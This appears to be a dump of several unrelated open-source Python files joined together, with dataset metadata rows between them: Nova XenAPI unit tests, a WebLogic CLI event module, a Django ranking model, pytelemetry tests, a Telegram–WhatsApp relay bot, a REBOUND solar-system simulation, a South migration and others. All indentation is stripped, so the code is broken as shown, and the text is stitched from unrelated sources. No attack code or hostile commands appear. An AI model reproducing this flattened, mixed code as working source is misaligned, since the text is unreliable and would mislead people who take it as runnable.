vbd_get_rec.side_effect = fake_vbd_get_rec
vdi_get_uuid.side_effect = fake_vdi_get_uuid
def test_get_all_vdi_uuids_for_vm_works(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
self._setup_get_all_vdi_uuids_for_vm(vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid)
result = vm_utils.get_all_vdi_uuids_for_vm('session', "vm_ref")
expected = ['vdi_ref_0', 'vdi_ref_2']
self.assertEqual(expected, list(result))
def test_get_all_vdi_uuids_for_vm_finds_none(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
self._setup_get_all_vdi_uuids_for_vm(vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid)
result = vm_utils.get_all_vdi_uuids_for_vm('session', "vm_ref",
min_userdevice=1)
expected = ["vdi_ref_2"]
self.assertEqual(expected, list(result))
class GetAllVdisTestCase(VMUtilsTestBase):
def test_get_all_vdis_in_sr(self):
def fake_get_rec(record_type, ref):
if ref == "2":
return "vdi_rec_2"
session = mock.Mock()
session.call_xenapi.return_value = ["1", "2"]
session.get_rec.side_effect = fake_get_rec
sr_ref = "sr_ref"
actual = list(vm_utils._get_all_vdis_in_sr(session, sr_ref))
self.assertEqual(actual, [('2', 'vdi_rec_2')])
session.call_xenapi.assert_called_once_with("SR.get_VDIs", sr_ref)
class SnapshotAttachedHereTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, '_snapshot_attached_here_impl')
def test_snapshot_attached_here(self, mock_impl):
def fake_impl(session, instance, vm_ref, label, userdevice,
post_snapshot_callback):
self.assertEqual("session", session)
self.assertEqual("instance", instance)
self.assertEqual("vm_ref", vm_ref)
self.assertEqual("label", label)
self.assertEqual('0', userdevice)
self.assertIsNone(post_snapshot_callback)
yield "fake"
mock_impl.side_effect = fake_impl
with vm_utils.snapshot_attached_here("session", "instance", "vm_ref",
"label") as result:
self.assertEqual("fake", result)
mock_impl.assert_called_once_with("session", "instance", "vm_ref",
"label", '0', None)
@mock.patch.object(vm_utils, 'safe_destroy_vdis')
@mock.patch.object(vm_utils, '_walk_vdi_chain')
@mock.patch.object(vm_utils, '_wait_for_vhd_coalesce')
@mock.patch.object(vm_utils, '_vdi_get_uuid')
@mock.patch.object(vm_utils, '_vdi_snapshot')
@mock.patch.object(vm_utils, '_get_vhd_parent_uuid')
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
def test_snapshot_attached_here_impl(self, mock_get_vdi_for_vm_safely,
mock_get_vhd_parent_uuid, mock_vdi_snapshot, mock_vdi_get_uuid,
mock_wait_for_vhd_coalesce, mock_walk_vdi_chain,
mock_safe_destroy_vdis):
session = "session"
instance = {"uuid": "uuid"}
mock_callback = mock.Mock()
mock_get_vdi_for_vm_safely.return_value = ("vdi_ref",
{"SR": "sr_ref"})
mock_get_vhd_parent_uuid.return_value = "original_uuid"
mock_vdi_snapshot.return_value = "snap_ref"
mock_vdi_get_uuid.return_value = "snap_uuid"
mock_walk_vdi_chain.return_value = [{"uuid": "a"}, {"uuid": "b"}]
try:
with vm_utils.snapshot_attached_here(session, instance, "vm_ref",
"label", '2', mock_callback) as result:
self.assertEqual(["a", "b"], result)
raise test.TestingException()
self.assertTrue(False)
except test.TestingException:
pass
mock_get_vdi_for_vm_safely.assert_called_once_with(session, "vm_ref",
'2')
mock_get_vhd_parent_uuid.assert_called_once_with(session, "vdi_ref")
mock_vdi_snapshot.assert_called_once_with(session, "vdi_ref")
mock_wait_for_vhd_coalesce.assert_called_once_with(session, instance,
"sr_ref", "vdi_ref", "original_uuid")
mock_vdi_get_uuid.assert_called_once_with(session, "snap_ref")
mock_walk_vdi_chain.assert_called_once_with(session, "snap_uuid")
mock_callback.assert_called_once_with(
task_state="image_pending_upload")
mock_safe_destroy_vdis.assert_called_once_with(session, ["snap_ref"])
class ImportMigratedDisksTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, '_import_migrate_ephemeral_disks')
@mock.patch.object(vm_utils, '_import_migrated_root_disk')
def test_import_all_migrated_disks(self, mock_root, mock_ephemeral):
session = "session"
instance = "instance"
mock_root.return_value = "root_vdi"
mock_ephemeral.return_value = ["a", "b"]
result = vm_utils.import_all_migrated_disks(session, instance)
expected = {'root': 'root_vdi', 'ephemerals': ["a", "b"]}
self.assertEqual(expected, result)
mock_root.assert_called_once_with(session, instance)
mock_ephemeral.assert_called_once_with(session, instance)
@mock.patch.object(vm_utils, '_import_migrated_vhds')
def test_import_migrated_root_disk(self, mock_migrate):
mock_migrate.return_value = "foo"
instance = {"uuid": "uuid", "name": "name"}
result = vm_utils._import_migrated_root_disk("s", instance)
self.assertEqual("foo", result)
mock_migrate.assert_called_once_with("s", instance, "uuid", "root",
"name")
@mock.patch.object(vm_utils, '_import_migrated_vhds')
def test_import_migrate_ephemeral_disks(self, mock_migrate):
mock_migrate.return_value = "foo"
instance = {"uuid": "uuid", "name": "name", "ephemeral_gb": 4000}
result = vm_utils._import_migrate_ephemeral_disks("s", instance)
self.assertEqual({'4': 'foo', '5': 'foo'}, result)
expected_calls = [mock.call("s", instance, "uuid_ephemeral_1",
"ephemeral", "name ephemeral (1)"),
mock.call("s", instance, "uuid_ephemeral_2",
"ephemeral", "name ephemeral (2)")]
self.assertEqual(expected_calls, mock_migrate.call_args_list)
@mock.patch.object(vm_utils, '_set_vdi_info')
@mock.patch.object(vm_utils, 'scan_default_sr')
@mock.patch.object(vm_utils, 'get_sr_path')
def test_import_migrated_vhds(self, mock_get_sr_path, mock_scan_sr,
mock_set_info):
session = mock.Mock()
instance = {"uuid": "uuid"}
session.call_plugin_serialized.return_value = {"root": {"uuid": "a"}}
session.call_xenapi.return_value = "vdi_ref"
mock_get_sr_path.return_value = "sr_path"
result = vm_utils._import_migrated_vhds(session, instance,
'chain_label', 'disk_type', 'vdi_label')
expected = {'uuid': "a", 'ref': "vdi_ref"}
self.assertEqual(expected, result)
mock_get_sr_path.assert_called_once_with(session)
session.call_plugin_serialized.assert_called_once_with('migration',
'move_vhds_into_sr', instance_uuid='chain_label',
sr_path='sr_path', uuid_stack=mock.ANY)
mock_scan_sr.assert_called_once_with(session)
session.call_xenapi.assert_called_once_with('VDI.get_by_uuid', 'a')
mock_set_info.assert_called_once_with(session, 'vdi_ref', 'disk_type',
'vdi_label', 'disk_type', instance)
class MigrateVHDTestCase(VMUtilsTestBase):
def _assert_transfer_called(self, session, label):
session.call_plugin_serialized.assert_called_once_with(
'migration', 'transfer_vhd', instance_uuid=label, host="dest",
vdi_uuid="vdi_uuid", sr_path="sr_path", seq_num=2)
def test_migrate_vhd_root(self):
session = mock.Mock()
instance = {"uuid": "a"}
vm_utils.migrate_vhd(session, instance, "vdi_uuid", "dest",
"sr_path", 2)
self._assert_transfer_called(session, "a")
def test_migrate_vhd_ephemeral(self):
session = mock.Mock()
instance = {"uuid": "a"}
vm_utils.migrate_vhd(session, instance, "vdi_uuid", "dest",
"sr_path", 2, 2)
self._assert_transfer_called(session, "a_ephemeral_2")
def test_migrate_vhd_converts_exceptions(self):
session = mock.Mock()
session.XenAPI.Failure = test.TestingException
session.call_plugin_serialized.side_effect = test.TestingException()
instance = {"uuid": "a"}
self.assertRaises(exception.MigrationError, vm_utils.migrate_vhd,
session, instance, "vdi_uuid", "dest", "sr_path", 2)
self._assert_transfer_called(session, "a")
class StripBaseMirrorTestCase(VMUtilsTestBase):
def test_strip_base_mirror_from_vdi_works(self):
session = mock.Mock()
vm_utils._try_strip_base_mirror_from_vdi(session, "vdi_ref")
session.call_xenapi.assert_called_once_with(
"VDI.remove_from_sm_config", "vdi_ref", "base_mirror")
def test_strip_base_mirror_from_vdi_hides_error(self):
session = mock.Mock()
session.XenAPI.Failure = test.TestingException
session.call_xenapi.side_effect = test.TestingException()
vm_utils._try_strip_base_mirror_from_vdi(session, "vdi_ref")
session.call_xenapi.assert_called_once_with(
"VDI.remove_from_sm_config", "vdi_ref", "base_mirror")
@mock.patch.object(vm_utils, '_try_strip_base_mirror_from_vdi')
def test_strip_base_mirror_from_vdis(self, mock_strip):
session = mock.Mock()
session.call_xenapi.return_value = {"VDI": "ref", "foo": "bar"}
vm_utils.strip_base_mirror_from_vdis(session, "vm_ref")
expected = [mock.call('VM.get_VBDs', "vm_ref"),
mock.call('VBD.get_record', "VDI"),
mock.call('VBD.get_record', "foo")]
self.assertEqual(expected, session.call_xenapi.call_args_list)
expected = [mock.call(session, "ref"), mock.call(session, "ref")]
self.assertEqual(expected, mock_strip.call_args_list)
class DeviceIdTestCase(VMUtilsTestBase):
def test_device_id_is_none_if_not_specified_in_meta_data(self):
image_meta = {}
session = mock.Mock()
session.product_version = (6, 1, 0)
self.assertIsNone(vm_utils.get_vm_device_id(session, image_meta))
def test_get_device_id_if_hypervisor_version_is_greater_than_6_1(self):
image_meta = {'xenapi_device_id': '0002'}
session = mock.Mock()
session.product_version = (6, 2, 0)
self.assertEqual('0002',
vm_utils.get_vm_device_id(session, image_meta))
session.product_version = (6, 3, 1)
self.assertEqual('0002',
vm_utils.get_vm_device_id(session, image_meta))
def test_raise_exception_if_device_id_not_supported_by_hyp_version(self):
image_meta = {'xenapi_device_id': '0002'}
session = mock.Mock()
session.product_version = (6, 0)
exc = self.assertRaises(exception.NovaException,
vm_utils.get_vm_device_id, session, image_meta)
self.assertEqual("Device id 0002 specified is not supported by "
"hypervisor version (6, 0)", exc.message)
session.product_version = ('6a')
exc = self.assertRaises(exception.NovaException,
vm_utils.get_vm_device_id, session, image_meta)
self.assertEqual("Device id 0002 specified is not supported by "
"hypervisor version 6a", exc.message)
class CreateVmRecordTestCase(VMUtilsTestBase):
@mock.patch.object(flavors, 'extract_flavor')
def test_create_vm_record(self, mock_extract_flavor):
session = mock.Mock()
instance = {"uuid": "uuid123"}
flavor = {"memory_mb": 1024, "vcpus": 1, "vcpu_weight": 2}
mock_extract_flavor.return_value = flavor
vm_utils.create_vm(session, instance, "name", "kernel", "ramdisk",
device_id="0002")
expected_vm_rec = {
'VCPUs_params': {'cap': '0', 'weight': '2'},
'PV_args': '',
'memory_static_min': '0',
'ha_restart_priority': '',
'HVM_boot_policy': 'BIOS order',
'PV_bootloader': '',
'tags': [],
'VCPUs_max': '1',
'memory_static_max': '1073741824',
'actions_after_shutdown': 'destroy',
'memory_dynamic_max': '1073741824',
'user_version': '0',
'xenstore_data': {'vm-data/allowvssprovider': 'false'},
'blocked_operations': {},
'is_a_template': False,
'name_description': '',
'memory_dynamic_min': '1073741824',
'actions_after_crash': 'destroy',
'memory_target': '1073741824',
'PV_ramdisk': '',
'PV_bootloader_args': '',
'PCI_bus': '',
'other_config': {'nova_uuid': 'uuid123'},
'name_label': 'name',
'actions_after_reboot': 'restart',
'VCPUs_at_startup': '1',
'HVM_boot_params': {'order': 'dc'},
'platform': {'nx': 'true', 'pae': 'true', 'apic': 'true',
'timeoffset': '0', 'viridian': 'true', 'acpi': 'true',
'device_id': '0002'},
'PV_legacy_args': '',
'PV_kernel': '',
'affinity': '',
'recommendations': '',
'ha_always_run': False}
session.call_xenapi.assert_called_with('VM.create', expected_vm_rec)
class ResizeFunctionTestCase(test.NoDBTestCase):
def _call_get_resize_func_name(self, brand, version):
session = mock.Mock()
session.product_brand = brand
session.product_version = version
return vm_utils._get_resize_func_name(session)
def _test_is_resize(self, brand, version):
result = self._call_get_resize_func_name(brand, version)
self.assertEqual("VDI.resize", result)
def _test_is_resize_online(self, brand, version):
result = self._call_get_resize_func_name(brand, version)
self.assertEqual("VDI.resize_online", result)
def test_xenserver_5_5(self):
self._test_is_resize_online("XenServer", (5, 5, 0))
def test_xenserver_6_0(self):
self._test_is_resize("XenServer", (6, 0, 0))
def test_xcp_1_1(self):
self._test_is_resize_online("XCP", (1, 1, 0))
def test_xcp_1_2(self):
self._test_is_resize("XCP", (1, 2, 0))
def test_xcp_2_0(self):
self._test_is_resize("XCP", (2, 0, 0))
def test_random_brand(self):
self._test_is_resize("asfd", (1, 1, 0))
def test_default(self):
self._test_is_resize(None, None)
def test_empty(self):
self._test_is_resize("", "")
def test_bad_version(self):
self._test_is_resize("XenServer", "asdf")
| apache-2.0 | 1,005,295,833,943,286,300 | 38.167815 | 79 | 0.585018 | false |
cerndb/wls-cli | wls_rest/src/wlscli/common/event.py | 1 | 2248 | #!/usr/bin/env python
#*******************************************************************************
# Copyright (C) 2015, CERN
# This software is distributed under the terms of the GNU General Public
# License version 3 (GPL Version 3), copied verbatim in the file "LICENSE".
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as Intergovernmental Organization
# or submit itself to any jurisdiction.
#
#
#*******************************************************************************
'''
Created on Oct 31, 2015
@author: Konrad Kaczkowski
'''
from utils import Operation
class UserEvent(object):
pass
class ConsoleUIEvent(object):
def __init__(self, command):
''' Constructor '''
self.command = command
class AdminChangeEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class AppEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class DeploymentEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class LogsEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ServerEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ShowEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class EventFactory(object):
types = { Operation.Server: ServerEvent, Operation.App: AppEvent,
Operation.Deployment: DeploymentEvent, Operation.Logs: LogsEvent,
Operation.Show: ShowEvent, Operation.AdmChange: AdminChangeEvent}
def __new__(cls, operation):
return EventFactory.types[type(operation)](operation)
| gpl-3.0 | 7,370,498,741,496,446,000 | 30.608696 | 80 | 0.581851 | false |
katharosada/bus-shaming | busshaming/models/route_ranking.py | 1 | 1414 | import uuid
from django.db import connection, models
from busshaming.enums import RouteMetric, MetricTimespan
UPSERT_ENTRY = '''
INSERT INTO busshaming_routeranking (id, route_id, date, timespan, metric, rank, display_rank, value)
VALUES (uuid_generate_v4(), %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (date, timespan, metric, rank)
DO UPDATE
SET route_id = EXCLUDED.route_id,
display_rank = EXCLUDED.display_rank,
value = EXCLUDED.value
'''
class RouteRankingManager(models.Manager):
def upsert(self, route_id, date, timespan, metric, rank, display_rank, value):
with connection.cursor() as cursor:
cursor.execute(UPSERT_ENTRY, (route_id, date, timespan, metric, rank, display_rank, value))
class RouteRanking(models.Model):
"""Denormalization of top N of each different kind of ranking."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
route = models.ForeignKey('Route')
date = models.DateField(db_index=True)
timespan = models.PositiveSmallIntegerField(choices=MetricTimespan.choices())
metric = models.PositiveSmallIntegerField(choices=RouteMetric.choices())
rank = models.PositiveSmallIntegerField()
display_rank = models.PositiveSmallIntegerField()
value = models.FloatField()
class Meta:
index_together = (('date', 'timespan', 'metric'),)
unique_together = (('date', 'timespan', 'metric', 'rank'),)
| mit | -8,858,094,445,648,581,000 | 36.210526 | 103 | 0.706506 | false |
Overdrivr/pytelemetry | pytelemetry/test/test_typing.py | 1 | 1747 | from pytelemetry import Pytelemetry
import queue
import pytest
import unittest.mock as mock
class transportMock:
def __init__(self):
self.queue = queue.Queue()
def read(self, maxbytes=1):
data = []
amount = 0
while amount < maxbytes and not self.queue.empty():
c = self.queue.get()
data.append(c)
amount += 1
return data
def readable(self):
return self.queue.qsize()
def write(self, data):
for i in range(len(data)):
self.queue.put(data[i])
return 0
def writeable(self):
return not self.queue.full()
def test_wrong_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(Exception) as excinfo:
c.publish('sometopic',12,'string')
# TODO : Assert exception
assert t.queue.qsize() == 0
def test_unexisting_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(IndexError):
c.publish('sometopic',12,'int323')
assert t.queue.qsize() == 0
def test_hardcoded():
t = transportMock()
c = Pytelemetry(t)
cb = mock.Mock(spec=["topic","data"])
c.subscribe('sometopic ',cb)
# Apply hardcoded frame directly generated by the c library
# SOF head sometopic..................................... eol 12457........ crc..... eof
t.write([247, 6, 0, 115, 111, 109, 101, 116, 111, 112, 105, 99, 32, 0, 169, 48, 0, 0, 111, 249, 127])
c.update()
assert t.queue.qsize() == 0
cb.assert_called_once_with('sometopic ',12457, None)
# TODO : Check what happens is string is non null terminated
# TODO : Check what happens if there are spaces in name
# TODO Check wrong crc
| mit | -6,212,126,936,606,328,000 | 25.876923 | 105 | 0.588437 | false |
MikeHoffert/caladbolg-engine | caladbolg/agents/battle.py | 1 | 1210 | import pyglet
from caladbolg.graphics import graphics_context
class ScriptedBattle:
def __init__(self, background_image, monsters, party):
self.background_image = background_image
self.monsters = monsters
self.party = party
def start_battle(self):
image = pyglet.image.load(self.background_image)
background_sprite = pyglet.sprite.Sprite(image)
# Figure out if we need to scale the background image for the user's screen
sprite_width = background_sprite.width
sprite_height = background_sprite.height
screen_width = graphics_context.screen_width
screen_height = graphics_context.screen_height
scale_factor = 1
if sprite_width < screen_width or sprite_height < screen_height:
scale_factor = min(screen_width / sprite_width, screen_height / sprite_height)
elif sprite_width > screen_width and sprite_height > screen_height:
scale_factor = max(screen_width / sprite_width, screen_height / sprite_height)
background_sprite.scale = scale_factor
graphics_context.sprite_buffer['background']['battle_background'] = background_sprite
| mit | -1,500,129,962,873,362,000 | 42.814815 | 93 | 0.671901 | false |
LeoGe/whattelcopybot | telegram_bot.py | 1 | 6255 | from multiprocessing import Process, Pipe
from os import getpid, urandom, path
from time import sleep
from enum import Enum
import binascii, json, signal, sys
from random import randint
from telegram.ext import Updater
from telegram.ext.dispatcher import run_async
from telegram.update import Update
class Command(Enum):
message = 1
token = 2
token_ack = 3
delete = 4
class TelegramBot(Process):
CREDENTIALS = "<CREDENTIALS-HERE>"
SAVEPATH = path.expanduser("~") + "/.config/whattelcopybot/telegram"
def __init__(self, conn):
self.connection=conn
super(TelegramBot, self).__init__()
self.telegram_to_whatsapp=dict()
with open("tokens.txt") as f:
self.poems = f.read().splitlines()
# save hashmap to file when exit
def save_to_file(self, signum, frame):
with open(TelegramBot.SAVEPATH, 'w+') as f:
f.write(json.dumps(self.telegram_to_whatsapp))
f.truncate()
sys.exit(0)
#load hashmap from file (if it exists and is not empty)
def load_from_file(self):
if path.isfile(TelegramBot.SAVEPATH):
with open(TelegramBot.SAVEPATH) as f:
read=f.read()
if read!="":
self.telegram_to_whatsapp = json.loads(read)
#send message to Telegram chat
def got_whatsapp(self, bot, msg):
if not "," in msg:
bot.sendMessage(int(msg), "Success: Connected to Whatsapp group!")
else:
telegram_id, content = msg.split(",")
bot.sendMessage(int(telegram_id), text=content)
# if both groups are connected send message to WhatsappBot
def got_telegram(self,bot,update):
if not type(update) is Update or update.message == None:
return
if update.message.new_chat_participant!=None:
if update.message.new_chat_participant.username=="WhattelCopyBot":
self.help(bot,update)
elif update.message.left_chat_participant!=None:
if update.message.left_chat_participant.username=="WhattelCopyBot":
print("REMOVE")
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
elif str(update.message.chat_id) in self.telegram_to_whatsapp:
whatsapp_id=self.telegram_to_whatsapp[str(update.message.chat_id)]
self.connection.send([Command.message, whatsapp_id, update.message.from_user.first_name+ ": " + update.message.text])
def help(self,bot,update):
helpText="Hello Traveller, my name is John Whattel. I will copy all of your messages from whatsapp to telegram and vice versa.\n/token (generate token to connects two chats)\n/delete (disconnects the chats)\n/help (show this notice again)"
bot.sendMessage(update.message.chat_id,text=helpText)
# generate token and send it to WhatsappBot and to the Telegram chat
def get_token(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
bot.sendMessage(update.message.chat_id,text="Sorry, chat is already connected to a Whatsapp group!")
return
rand_int = randint(0,len(self.poems))
while self.poems[rand_int] == "":
rand_int = randint(0,len(self.poems))
bot.sendMessage(update.message.chat_id, text="Please paste this token into the Whatsapp chat you want to be connected to. I have to be a member of this chat.")
bot.sendMessage(update.message.chat_id, text="Generated token: "+self.poems[rand_int])
self.connection.send([Command.token, self.poems[rand_int], update.message.chat_id])
self.poems[rand_int]=""
def delete(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
bot.sendMessage(update.message.chat_id, text="Hey there, this chat connecion was deleted")
else:
bot.sendMessage(update.message.chat_id, text="Something went terribly wrong :( This chat is not connected")
def run(self):
print("Start TelegramBot with PID: " + str(getpid()))
# connect to TelegramBot with CREDENTIALS
updater = Updater(TelegramBot.CREDENTIALS)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Message handlers only receive updates that don't contain commands
dp.addTelegramMessageHandler(self.got_telegram)
# got a whatsapp message
dp.addStringRegexHandler('[^/].*', self.got_whatsapp)
dp.addTelegramCommandHandler("help", self.help)
dp.addTelegramCommandHandler("token", self.get_token)
dp.addTelegramCommandHandler("delete", self.delete)
# All TelegramErrors are caught for you and delivered to the error
# handler(s). Other types of Errors are not caught.
#dp.addErrorHandler(error)
# Start the Bot and store the update Queue, so we can insert updates
update_queue = updater.start_polling(poll_interval=0.1, timeout=10)
# save our hashmap when the TelegramBot is terminated
signal.signal(signal.SIGINT, self.save_to_file)
signal.signal(signal.SIGTERM, self.save_to_file)
# load our hashmap when the TelegramBot is started
self.load_from_file()
isRunning = True
while isRunning:
msg = self.connection.recv()
if msg[0] == Command.message:
update_queue.put(str(msg[1])+","+str(msg[2]))
elif msg[0] == Command.token_ack:
# connect Telegram ID to Whatsapp ID
self.telegram_to_whatsapp[str(msg[2])] = msg[1]
update_queue.put(str(msg[2]))
elif msg[0] == Command.token:
print("Error: got wrong message from WhatsappBot")
| mit | 7,155,374,051,801,064,000 | 42.4375 | 247 | 0.63757 | false |
ah-anssi/SecuML | SecuML/core/DimensionReduction/FeatureSelection.py | 1 | 1077 | # SecuML
# Copyright (C) 2017 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import abc
from .DimensionReduction import DimensionReduction
class FeatureSelection(DimensionReduction):
def __init__(self, conf):
DimensionReduction.__init__(self, conf)
def setProjectionMatrix(self):
self.projection_matrix = None
@abc.abstractmethod
def generateInputParameters(self, instances):
return
@abc.abstractmethod
def fit(self, instances):
return
| gpl-2.0 | -574,789,287,961,227,200 | 28.916667 | 73 | 0.732591 | false |
quasars100/Resonance_testing_scripts | python_examples/outersolarsystem/problem.py | 1 | 1831 | # Import the rebound module
import rebound
# Set variables (defaults are G=1, t=0, dt=0.01)
k = 0.01720209895 # Gaussian constant
rebound.G = k*k # Gravitational constant
# Setup particles (data taken from NASA Horizons)
# This could also be easily read in from a file.
rebound.add( m=1.00000597682, x=-4.06428567034226e-3, y=-6.08813756435987e-3, z=-1.66162304225834e-6, vx=+6.69048890636161e-6, vy=-6.33922479583593e-6, vz=-3.13202145590767e-9) # Sun
rebound.add( m=1./1047.355, x=+3.40546614227466e+0, y=+3.62978190075864e+0, z=+3.42386261766577e-2, vx=-5.59797969310664e-3, vy=+5.51815399480116e-3, vz=-2.66711392865591e-6) # Jupiter
rebound.add( m=1./3501.6, x=+6.60801554403466e+0, y=+6.38084674585064e+0, z=-1.36145963724542e-1, vx=-4.17354020307064e-3, vy=+3.99723751748116e-3, vz=+1.67206320571441e-5) # Saturn
rebound.add( m=1./22869., x=+1.11636331405597e+1, y=+1.60373479057256e+1, z=+3.61783279369958e-1, vx=-3.25884806151064e-3, vy=+2.06438412905916e-3, vz=-2.17699042180559e-5) # Uranus
rebound.add( m=1./19314., x=-3.01777243405203e+1, y=+1.91155314998064e+0, z=-1.53887595621042e-1, vx=-2.17471785045538e-4, vy=-3.11361111025884e-3, vz=+3.58344705491441e-5) # Neptune
rebound.add( m=0, x=-2.13858977531573e+1, y=+3.20719104739886e+1, z=+2.49245689556096e+0, vx=-1.76936577252484e-3, vy=-2.06720938381724e-3, vz=+6.58091931493844e-4) # Pluto
# Set the center of momentum to be at the origin
rebound.move_to_com()
# timestep counter
steps = 0
# Integrate until t=1e6 (unit of time in this example is days)
while rebound.t < 1e6:
rebound.step()
steps += 1
# Print particle positions every 100 timesteps
if steps%100==0:
for p in rebound.particles:
# time x y z
print(rebound.t, p.x, p.y, p.z)
| gpl-3.0 | 544,620,907,989,148,000 | 58.064516 | 188 | 0.687602 | false |
hzlf/openbroadcast | website/apps/spf/migrations/0020_auto__add_field_match_isrc_list.py | 1 | 5230 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Match.isrc_list'
db.add_column('spf_match', 'isrc_list',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Match.isrc_list'
db.delete_column('spf_match', 'isrc_list')
models = {
'spf.match': {
'Meta': {'ordering': "('created',)", 'object_name': 'Match'},
'artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'artist_credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'artist_credits_secondary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'iswc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'mb_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'release_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'request': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['spf.Request']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'work_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'spf.request': {
'Meta': {'ordering': "('swp_id',)", 'object_name': 'Request'},
'catalognumber': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'composer': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'main_artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'obp_legacy_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'publication_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'publication_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'recording_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'rome_protected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'swp_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['spf'] | gpl-3.0 | -3,241,384,390,019,928,600 | 74.811594 | 169 | 0.546654 | false |
vinoth3v/In | In/nabar/admin/form/nabar_role.py | 1 | 1255 |
class FormNabarRoleAdmin(Form):
def __init__(self, data = None, items = None, post = None, **args):
if data is None: data = {}
if post is None: post = {}
if 'id' not in data:
data['id'] = 'FormNabarRoleAdmin'
super().__init__(data, items, **args)
